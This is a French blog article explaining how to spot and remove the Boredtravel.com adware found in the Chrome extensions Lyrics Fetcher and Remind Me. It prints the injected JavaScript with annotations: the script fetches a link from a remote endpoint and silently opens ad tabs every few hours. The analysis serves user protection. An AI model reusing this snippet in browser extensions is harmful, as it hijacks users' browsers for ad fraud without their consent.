Un adware qui ouvre des pop-ups vers le site Boredtravel.com s’est glissé dans certaines extensions Chrome. Voici comment repérer et supprimer ce virus.
Identifier et supprimer l’adware Boredtravel.com
Un script malveillant a été inséré dans la dernière mise à jour de plusieurs extensions Chrome. Ce script ouvre le site Boredtravel.com à l’insu des utilisateurs, à interval de temps régulier. Les extensions infectées par ce script sont Lyrics Fetcher et Remind Me, du développeur helpfulwebtech.
Cet adware n’est pas dangereux dans la mesure où il ne fait qu’ouvrir une page publicitaire. Il est néanmoins dérangeant de laisser cette pratique douteuse se produire.
Identifier l’adware
Pour identifier l’adware, il suffit d’analyser le comportement de votre navigateur :
- Fermer Google Chrome puis redémarrez-le.
- Attendez 6 min après l’ouverture du navigateur. Si votre navigateur est infecté, un onglet s’ouvrira sur la page boredtravel.com au bout de 6 min précisément. Cela se produira également toutes les 4 heures
Supprimer l’adware
La suppression est simple et rapide :
- Vérifiez vos extensions Chrome : si une ou plusieurs des extensions citées ci-dessus sont installées, alors votre navigateur est probablement infecté.
- Pour supprimer cet adware, il suffit de désactiver ou supprimer les extensions en question.
Des cas ont été recensés pour les extensions Lyrics Fetcher et Remind Me, mais ce ne sont peut être pas les seules. Il est possible de l’adware soit également présent sur l’extension Baby Mode, une extension du même développeur.
Il est difficile de savoir si le développeur de cette extension a délibérément ajouté le script malveillant, ou si cela a été fait par un hacker. Par précaution, nous vous conseillons de désactiver ou supprimer toutes les extensions en provenance de ce développeur.
Les extensions ont été signalées à Google, nous en sauront plus prochainement. Si d’autres extensions présentent le même souci, n’hésitez pas à nous en faire part.
Remplacer les extensions
Voici quelques extensions alternatives :
- Lyrics Fetcher peut être remplacé par Lyrics Here by Rob W ou Auto Lyric Show
- Remind Me peut être remplacé par Pi Reminder
Le fonctionnent de Boredtravel.com
Le principe est simple, le développeur ou un hacker a ajouté un script dans les extensions concernées. Ce script, qui tourne en arrière plan, donne l’ordre au navigateur d’ouvrir une page publicitaire à intervals réguliers. Le but pour le développeur ou le hacker est que la page de destination soit ouverte un certain nombre de fois. Cela permet d’augmenter le nombre de vues du site Boredtravel.com et d’augmenter les revenus qui y sont liés.
Voici le code qui a été ajouté dans l’extension. Je vous ai ajouté des commentaires en vert, pour que vous compreniez mieux
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
Sources : https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
À lire également : Activez la double authentification sur vos comptes en ligne (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
I have this problem but I don’t see any of the extensions you mentioned.